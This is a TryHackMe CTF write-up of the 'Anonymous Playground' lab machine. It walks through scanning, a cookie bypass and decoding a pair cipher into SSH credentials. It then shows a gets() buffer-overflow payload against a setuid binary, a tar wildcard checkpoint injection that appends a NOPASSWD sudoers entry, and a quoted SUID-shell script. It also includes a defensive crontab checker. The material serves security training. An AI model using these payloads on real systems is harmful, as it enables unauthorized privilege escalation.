[THM] Anonymous Playground


Introduction

Anonymous Playground is a hard-rated machine on TryHackMe. The main topics are decrypting an affine-like cipher, exploiting a stack overflow, and privilege escalation through tar. With a broad enough knowledge base the box is quite manageable.

Information Gathering

Port and service scan

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nmap -p- --min-rate=10000 10.10.1.59
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:08 CST
Nmap scan report for 10.10.1.59
Host is up (0.30s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 16.86 seconds

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nmap -sV -sT -O -p22,80 10.10.1.59
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:09 CST
Nmap scan report for 10.10.1.59
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.28 seconds

Only ports 22 and 80 are open; not many, but enough to work with.

Vulnerability scanning

nmap script scan

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nmap --script=vuln 10.10.1.59
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-05 10:10 CST
Nmap scan report for 10.10.1.59
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-sql-injection:
| Possible sqli for queries:
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DD%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DD%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DD%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DD%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=S%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=M%3BO%3DA%27%20OR%20sqlspider
| http://10.10.1.59:80/js/?C=N%3BO%3DA%27%20OR%20sqlspider
|_ http://10.10.1.59:80/js/?C=D%3BO%3DA%27%20OR%20sqlspider
| http-enum:
| /robots.txt: Robots file
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-aspnet-debug:
|_ status: DEBUG is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.1.1

Nmap done: 1 IP address (1 host up) scanned in 52.40 seconds

The SQL injection findings are false positives and can be ignored. robots.txt is worth a look. http-aspnet-debug reports that ASP.NET debug mode is enabled; from what I found this may allow reading sensitive files on the web server, but I could not find any material describing a concrete way to exploit it, so I set it aside for now.

nikto

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ sudo nikto -h 10.10.1.59
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.1.59
+ Target Hostname: 10.10.1.59
+ Target Port: 80
+ Start Time: 2023-07-05 10:12:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie access created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/zYdHuAKjP/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8076 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-07-05 10:49:23 (GMT8) (2211 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

nikto also tells us that robots.txt asks us not to visit the /zYdHuAKjP/ directory. That is a giveaway, so we definitely need to look.

Web penetration testing

First, open the site in a browser.


The homepage shows the classic V for Vendetta mask and nothing else of note. Let's click Operatives in the navigation bar.


It lists a series of IDs that may well be usernames, so note them down and keep a copy.

Clicking Contact does nothing.

So let's look at the directory that robots.txt did not want us to visit.


It says we are not authorized to access it. There was no login prompt at all, so let's figure out what is going on: open the browser console and look at the request and response.


The Cookie contains an access value set to denied. Let's change it to granted and see whether that bypasses the authorization check. Sending the request with curl is the most convenient way; in Firefox you can also edit and resend the request directly.

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ curl http://10.10.1.59/zYdHuAKjP/ -v -H "Cookie:access=granted"
* Trying 10.10.1.59:80...
* Connected to 10.10.1.59 (10.10.1.59) port 80 (#0)
> GET /zYdHuAKjP/ HTTP/1.1
> Host: 10.10.1.59
> User-Agent: curl/7.88.1
> Accept: */*
> Cookie:access=granted
>
< HTTP/1.1 200 OK
< Date: Wed, 05 Jul 2023 09:19:51 GMT
< Server: Apache/2.4.29 (Ubuntu)
< Set-Cookie: access=denied; expires=Fri, 04-Aug-2023 09:19:51 GMT; Max-Age=2592000; path=/
< Vary: Accept-Encoding
< Content-Length: 1379
< Content-Type: text/html; charset=UTF-8
<

<!doctype html>


<html lang="en">

<head>
<title>Proving Grounds</title>
<!-- Required meta tags -->
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<!-- Bootstrap CSS -->
<link rel="stylesheet" href="/css/bootstrap.min.css">
<!-- Custom CSS -->
<link rel="stylesheet" href="/css/main.css">

<link rel="shortcut icon" href="/favicon.png" type="image/x-icon">
</head>

<body>
<div class="container-fluid">
<ul class="nav justify-content-center mb-3">
<li class="nav-item">
<a class="nav-link active text-white" href="/">Home</a>
</li>
<li class="nav-item">
<a class="nav-link text-white" href="/operatives.php">Operatives</a>
</li>
<li class="nav-item">
<a class="nav-link text-white" href="#">Contact</a>
</li>
</ul>

<div class='row'>
<div class='col'>
<p class='text-center'>Access granted. <br />
Well done getting this far. But can you go further? <br /> <br />
<span style='font-size: 30px;'>hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN</span>
</p>
</div>
</div>
</div>
</body>
* Connection #0 to host 10.10.1.59 left intact

Decrypting the ciphertext

We can see that access is now granted, and the response contains a string of unknown nature: hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN. At a glance it does not look like a hash or any common encoding. The :: in the middle is familiar from /etc/passwd and /etc/shadow, so this looks like a username and a password. The question then is how to decrypt the password. I had no idea at first, until 通神, sitting next to me, pointed out that the username and the first part of the password are identical, that the chunk zAfH near the end looks like part of the username reversed, and that the characters come in lowercase/uppercase pairs, which strongly suggests two ciphertext characters map to one plaintext character.

If that is true, the username is a 5-character string whose 2nd and 5th characters are the same. Time to recall the list of suspected usernames we found earlier and check whether any of them fits. One does: magna.

Now the second problem: we have part of the plaintext and its ciphertext, but we still need to work out how two letters map to one letter; in other words, the substitution table is still to be discovered.

The first natural idea was ASCII values: subtracting the two did not work. Next I tried alphabet positions: subtraction did not work either, but addition worked for every pair except zA, which gives 27; taken mod 26 that works too. Decoding everything this way, the password came out as a meaningful phrase, so the method is very likely right. In summary, the mapping is:
$$
\text{plaintext position} = (x + Y) \bmod 26
$$
where x and Y are the alphabet positions of the lowercase and uppercase letters of a pair: the two letters are added modulo 26 and the result is the plaintext letter's position in the alphabet. A very simple mapping in the end, but you are stuck if you cannot think of it.
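As an added example (not part of the original write-up), the mapping above in code: decode the credential string the page returned, and check the "identical pairs must be identical letters" reasoning that led to magna. The only assumption beyond the page is that a sum that is a multiple of 26 is read as position 26, i.e. z.

```python
from __future__ import annotations

import string

ALPHABET = string.ascii_lowercase

# The string returned by /zYdHuAKjP/ once the cookie check was bypassed (from the page).
CREDS = "hEzAdCfHzA::hEzAdCfHzAhAiJzAeIaDjBcBhHgAzAfHfN"


def pos1(ch: str) -> int:
    """1-based alphabet position of a letter (case-insensitive)."""
    return ALPHABET.index(ch.lower()) + 1


def decode_pair(lower: str, upper: str) -> str:
    """One lower/upper pair -> one plaintext letter: (x + Y) mod 26, 1-based.
    A sum that is a multiple of 26 (remainder 0) is read as position 26 = 'z';
    that is an assumption, the page only states the mod-26 rule."""
    if not (lower.islower() and upper.isupper()):
        raise ValueError(f"unexpected pair {lower}{upper}: want lower then upper")
    n = (pos1(lower) + pos1(upper)) % 26
    return ALPHABET[(n or 26) - 1]


def decode(ciphertext: str) -> str:
    """Decode a whole string of pairs, e.g. hEzAdCfHzA -> magna."""
    if len(ciphertext) % 2:
        raise ValueError("ciphertext must consist of 2-letter pairs")
    return "".join(decode_pair(ciphertext[i], ciphertext[i + 1])
                   for i in range(0, len(ciphertext), 2))


def split_credentials(blob: str) -> tuple[str, str]:
    """'user::password' (the format found on the page) -> decoded (user, password)."""
    user_ct, _, pass_ct = blob.partition("::")
    return decode(user_ct), decode(pass_ct)


def pair_pattern(ciphertext: str) -> list[int]:
    """Number each pair by first occurrence: hEzAdCfHzA -> [0, 1, 2, 3, 1].
    This is the 'positions 2 and 5 are the same letter' observation in code."""
    seen: dict[str, int] = {}
    return [seen.setdefault(ciphertext[i:i + 2], len(seen))
            for i in range(0, len(ciphertext), 2)]


def could_be(ciphertext: str, candidate: str) -> bool:
    """Necessary (not sufficient) check for a candidate plaintext before the
    mapping is known: right length, and identical pairs must line up with
    identical letters. Different pairs may still decode to the same letter."""
    if 2 * len(candidate) != len(ciphertext):
        return False
    letter_for: dict[int, str] = {}
    for k, ch in zip(pair_pattern(ciphertext), candidate):
        if letter_for.setdefault(k, ch) != ch:
            return False
    return True


if __name__ == "__main__":
    user, password = split_credentials(CREDS)
    print("user:", user, "| password length:", len(password))
    print("could 'magna' fit the username ciphertext?", could_be("hEzAdCfHzA", "magna"))
```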

Getting a foothold

Now that we have login credentials, we log in directly via SSH.

┌──(kali㉿kali)-[~/THM/Anonymous_Playground/workSpace]
└─$ ssh magna@10.10.1.59
The authenticity of host '10.10.1.59 (10.10.1.59)' can't be established.
ED25519 key fingerprint is SHA256:zKvTLbgKsGoKUlP7w/r2yJkjWulPOJtp0DhBDy/GlFQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.1.59' (ED25519) to the list of known hosts.
magna@10.10.1.59's password:
Permission denied, please try again.
magna@10.10.1.59's password:
Permission denied, please try again.
magna@10.10.1.59's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-109-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Jul 5 03:21:46 UTC 2023

System load: 0.14 Processes: 97
Usage of /: 22.9% of 19.56GB Users logged in: 0
Memory usage: 35% IP address for eth0: 10.10.1.59
Swap usage: 0%


3 packages can be updated.
0 updates are security updates.


Last login: Fri Jul 10 13:54:20 2020 from 192.168.86.65
magna@anonymous-playground:~$

Login succeeded, and the first flag is in the home directory.

Exploitation

Buffer overflow

Besides the flag, the home directory holds a few other interesting things.

magna@anonymous-playground:~$ ls -la
total 64
drwxr-xr-x 7 magna magna 4096 Jul 10 2020 .
drwxr-xr-x 5 root root 4096 Jul 4 2020 ..
lrwxrwxrwx 1 root root 9 Jul 4 2020 .bash_history -> /dev/null
-rw-r--r-- 1 magna magna 220 Jul 4 2020 .bash_logout
-rw-r--r-- 1 magna magna 3771 Jul 4 2020 .bashrc
drwx------ 2 magna magna 4096 Jul 4 2020 .cache
drwxr-xr-x 3 magna magna 4096 Jul 7 2020 .config
-r-------- 1 magna magna 33 Jul 4 2020 flag.txt
drwx------ 3 magna magna 4096 Jul 4 2020 .gnupg
-rwsr-xr-x 1 root root 8528 Jul 10 2020 hacktheworld
drwxrwxr-x 3 magna magna 4096 Jul 4 2020 .local
-rw-r--r-- 1 spooky spooky 324 Jul 6 2020 note_from_spooky.txt
-rw-r--r-- 1 magna magna 807 Jul 4 2020 .profile
drwx------ 2 magna magna 4096 Jul 4 2020 .ssh
-rw------- 1 magna magna 817 Jul 7 2020 .viminfo

Let's look at note_from_spooky.txt.

magna@anonymous-playground:~$ cat note_from_spooky.txt 
Hey Magna,

Check out this binary I made! I've been practicing my skills in C so that I can get better at Reverse
Engineering and Malware Development. I think this is a really good start. See if you can break it!

P.S. I've had the admins install radare2 and gdb so you can debug and reverse it right here!

Best,
Spooky

So spooky wants to test our reverse engineering skills. Naturally we accept the challenge.

(He kindly had radare2 and gdb installed, but I am not used to them, so IDA it is.)


Download the file with scp and load it into our beloved IDA.

Find the main function and press F5 to view the pseudocode.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[64]; // [rsp+10h] [rbp-40h] BYREF

  printf("Who do you want to hack? ");
  gets(v4);
  return 0;
}

Key word: gets(), our favourite buffer overflow. If you are not familiar with exploiting buffer overflows, this article explains it in good detail.

We found the vulnerability; now how do we exploit it? We notice that the binary also contains a function called call_bash; let's see what it does.


The setuid(0x539u) call is in effect setting the S bit (0x539u is a hexadecimal unsigned value, which converts to S). Then it calls sh. But following the program's normal flow, this function is never executed. Since we have the buffer overflow, the goal is clear: construct a payload that overwrites the return address and jumps to call_bash.

How much data do we need to write before the address? char v4[64]; // [rsp+10h] [rbp-40h] BYREF tells us the array is 64 bytes, and on a 64-bit program the saved BP is 8 bytes, so 64 + 8 = 72 bytes of padding, followed by the return address of call_bash, 0000000000400657. Note that it is little-endian, so the bytes are written in reverse order. The final payload is:

python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"

Typing the hex bytes directly on the command line causes problems, so we generate them with python and pipe the output into hacktheworld.

magna@anonymous-playground:~$ python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld 
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
Segmentation fault (core dumped)

We successfully reached call_bash, but it ends with Segmentation fault (core dumped). What is going on? Where is the promised sh?

After some thought, it seemed that sh was started but exited immediately because nothing was passed to it. Let's try appending a command.

magna@anonymous-playground:~$ (python -c "print 'a'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat) | ./hacktheworld 
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
whoami
Segmentation fault (core dumped)

Still no luck: it seems to work, but exits with an error as soon as a command is entered. Very strange. Puzzled, I checked other people's write-ups and found that changing \x57 to \x58 makes it work, which is odd: the function clearly starts at 57 and we already reached it successfully, so why would this happen? Utterly baffling.

magna@anonymous-playground:~$ (python -c "print 'a'*72+'\x58\x06\x40\x00\x00\x00\x00\x00'"; cat) | ./hacktheworld
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
whoami
spooky
python -c "import pty;pty.spawn('/bin/bash')"
spooky@anonymous-playground:~$

I cannot explain it, but it worked. Let's move on.

Privilege escalation

With spooky's privileges, the second flag is in the home directory.

spooky@anonymous-playground:/home/spooky$ ls -la
ls -la
total 36
drwxr-xr-x 4 spooky spooky 4096 Jul 10 2020 .
drwxr-xr-x 5 root root 4096 Jul 4 2020 ..
lrwxrwxrwx 1 root root 9 Jul 4 2020 .bash_history -> /dev/null
-rw-r--r-- 1 spooky spooky 220 Jul 4 2020 .bash_logout
-rw-r--r-- 1 spooky spooky 3771 Jul 4 2020 .bashrc
-rwxrwxrwx 1 spooky magna 0 Jul 10 2020 .confrc
-r-------- 1 spooky spooky 33 Jul 4 2020 flag.txt
drwxrwxr-x 3 spooky spooky 4096 Jul 5 2020 .local
-rw-r--r-- 1 spooky spooky 807 Jul 4 2020 .profile
drwx------ 2 spooky spooky 4096 Jul 8 2020 .ssh
-rw-rw-r-- 1 spooky magna 535 Jul 10 2020 .webscript

The .webscript file is suspicious; let's look at its contents.

spooky@anonymous-playground:/home/spooky$ cat .web
cat .webscript
#!/bin/sh

# get current user uid / gid
CURR_UID="$(id -u)"
CURR_GID="$(id -g)"

# save file
cat > .cachefile.c << EOF
#include <stdio.h>
int main()
{
setuid($CURR_UID);
setgid($CURR_GID);
execl("/bin/bash", "-bash", NULL);
return 0;
}
EOF

# make folder where the payload will be saved
mkdir .cache
chmod 755 .cache

# compile & give SUID
gcc -w .cachefile.c -o .cache/.cachefile
chmod 4755 .cache/.cachefile

# clean up
rm -rf ./'--checkpoint=1'
rm -rf ./'--checkpoint-action=exec=sh .webscript'
rm -rf .webscript
rm -rf .cachefile.c

Reading through it, isn't this the textbook tar privilege escalation? Is this a hint from the author? Let's check whether there is a scheduled tar backup job in the crontab.

spooky@anonymous-playground:/home/dev$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/1 * * * * root cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
#

Sure enough, there is. And since it runs tar on *, it can be exploited directly.

tar privilege escalation
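From the defender's side, as an added example that is not from the original write-up: a small check that flags crontab entries of the shape above (a privileged tar run over an unquoted *, where any file name starting with - becomes a tar option) and lists option-like file names already present in a directory. The sample crontab and the planted names are constructed copies of what the page shows; the hardened line relies on tar ending option parsing at --, and replacing the glob with -C /home/spooky . is the stronger fix.

```python
from __future__ import annotations

import os
import re
import shlex
import tempfile

# Constructed copy of the relevant /etc/crontab entries from the page, plus a
# hardened variant of the backup line for comparison.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/1 * * * * root cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
"""
# '--' ends option parsing, so a glob-expanded '--checkpoint=1' is just a file name.
# Archiving '-C /home/spooky .' (no glob at all) is the stronger fix.
HARDENED_LINE = "*/1 * * * * root cd /home/spooky && tar -zcf /var/backups/spooky.tgz -- *\n"


def tar_glob_hazards(crontab_text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, user, tar_command) for system-crontab entries whose tar
    invocation takes an unquoted '*' with no '--' before it: every file the
    glob expands to is parsed as an option if its name starts with '-'."""
    hits = []
    for no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value assignment
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) < 7:
            continue
        user, command = fields[5], fields[6]
        for segment in re.split(r"&&|\|\||;|\|", command):
            words = shlex.split(segment)
            if not words or os.path.basename(words[0]) != "tar":
                continue
            args = words[1:]
            if "*" in args and "--" not in args[: args.index("*")]:
                hits.append((no, user, segment.strip()))
    return hits


def option_like_names(directory: str) -> list[str]:
    """File names in `directory` that a glob would hand to tar (or any
    getopt-style tool) as an option rather than a path."""
    return sorted(n for n in os.listdir(directory) if n.startswith("-"))


def planted_names_example() -> list[str]:
    """Build a throwaway directory holding the two file names the page's
    .webscript cleans up (constructed here) next to an ordinary file, and
    report which of them would be mistaken for tar options."""
    with tempfile.TemporaryDirectory() as tmp:
        for name in ("--checkpoint=1", "--checkpoint-action=exec=sh exp.sh", "flag.txt"):
            open(os.path.join(tmp, name), "w").close()
        return option_like_names(tmp)


if __name__ == "__main__":
    for no, user, cmd in tar_glob_hazards(SAMPLE_CRONTAB):
        print(f"crontab line {no}: {user} runs `{cmd}` on a glob")
    print("hazards in hardened line:", tar_glob_hazards(HARDENED_LINE))
    print("option-like names:", planted_names_example())
```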

  1. Step one of the tar escalation: write the exploit script.

    spooky@anonymous-playground:/home/spooky$ echo '#!/bin/bash' > exp.sh
    echo '#!/bin/bash' > exp.sh
    spooky@anonymous-playground:/home/spooky$ echo '' >> exp.sh
    echo '' >> exp.sh
    spooky@anonymous-playground:/home/spooky$ echo 'echo "spooky ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' >> exp.sh
    ALL" >> /etc/sudoers' >> exp.shPASSWD:A
    spooky@anonymous-playground:/home/spooky$ cat exp.sh
    cat exp.sh
    #!/bin/bash
    echo "spooky ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

    The goal is to add the current user to sudoers; after that we can do as we please.

  2. Step two: create the checkpoint files.

    spooky@anonymous-playground:/home/spooky$ echo '' > '--checkpoint-action=exec=sh exp.sh'   
    exp.sh'> '--checkpoint-action=exec=sh
    spooky@anonymous-playground:/home/spooky$ echo '' > --checkpoint=1
    echo '' > --checkpoint=1
    spooky@anonymous-playground:/home/spooky$ ls -la
    ls -la
    total 48
    drwxr-xr-x 4 spooky spooky 4096 Jul 5 09:05 .
    drwxr-xr-x 5 root root 4096 Jul 4 2020 ..
    lrwxrwxrwx 1 root root 9 Jul 4 2020 .bash_history -> /dev/null
    -rw-r--r-- 1 spooky spooky 220 Jul 4 2020 .bash_logout
    -rw-r--r-- 1 spooky spooky 3771 Jul 4 2020 .bashrc
    -rw-rw-r-- 1 spooky magna 1 Jul 5 09:05 '--checkpoint=1'
    -rw-rw-r-- 1 spooky magna 1 Jul 5 09:04 '--checkpoint-action=exec=sh exp.sh'
    -rwxrwxrwx 1 spooky magna 0 Jul 10 2020 .confrc
    -rw-rw-r-- 1 spooky magna 66 Jul 5 09:02 exp.sh
    -r-------- 1 spooky spooky 33 Jul 4 2020 flag.txt
    drwxrwxr-x 3 spooky spooky 4096 Jul 5 2020 .local
    -rw-r--r-- 1 spooky spooky 807 Jul 4 2020 .profile
    drwx------ 2 spooky spooky 4096 Jul 8 2020 .ssh
    -rw-rw-r-- 1 spooky magna 535 Jul 10 2020 .webscript
  3. Step three: the trap is set and the hunter waits for the prey. The crontab entry is */1, so it should run every minute and the result will come quickly.

  4. After a short wait, sudo -l shows it worked.

    spooky@anonymous-playground:/home/spooky$ sudo -l
    sudo -l
    Matching Defaults entries for spooky on anonymous-playground:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

    User spooky may run the following commands on anonymous-playground:
    (ALL) NOPASSWD: ALL
    (ALL) NOPASSWD: ALL
    spooky@anonymous-playground:/home/spooky$ sudo su
    sudo su
    root@anonymous-playground:/home/spooky# cd /root
    cd /root
    root@anonymous-playground:~# ls -la
    ls -la
    total 408
    drwx------ 7 root root 4096 Jul 8 2020 .
    drwxr-xr-x 24 root root 4096 Jul 4 2020 ..
    lrwxrwxrwx 1 root root 9 Jul 4 2020 .bash_history -> /dev/null
    -rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
    drwx------ 3 root root 4096 Jul 6 2020 .cache
    drwxr-xr-x 3 root root 4096 Jul 7 2020 .config
    -r-------- 1 root root 33 Jul 4 2020 flag.txt
    -rw------- 1 root root 242 Jul 8 2020 .gdb_history
    -rw-r--r-- 1 root root 29 Jul 7 2020 .gdbinit
    -rw-r--r-- 1 root root 356593 Jul 7 2020 .gdbinit-gef.py
    drwx------ 3 root root 4096 Jul 4 2020 .gnupg
    drwxr-xr-x 3 root root 4096 Jul 4 2020 .local
    -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
    -rw-r--r-- 1 root root 66 Jul 5 2020 .selected_editor
    drwx------ 2 root root 4096 Jul 7 2020 .ssh
    -rw-r--r-- 1 root root 215 Jul 7 2020 .wget-hsts
    root@anonymous-playground:~# cat flag.txt

    Root flag obtained.

Summary

This machine leans toward CTF: it touches a bit of every area. None of it is hard, but it requires a broad knowledge base; you need to know a little of everything.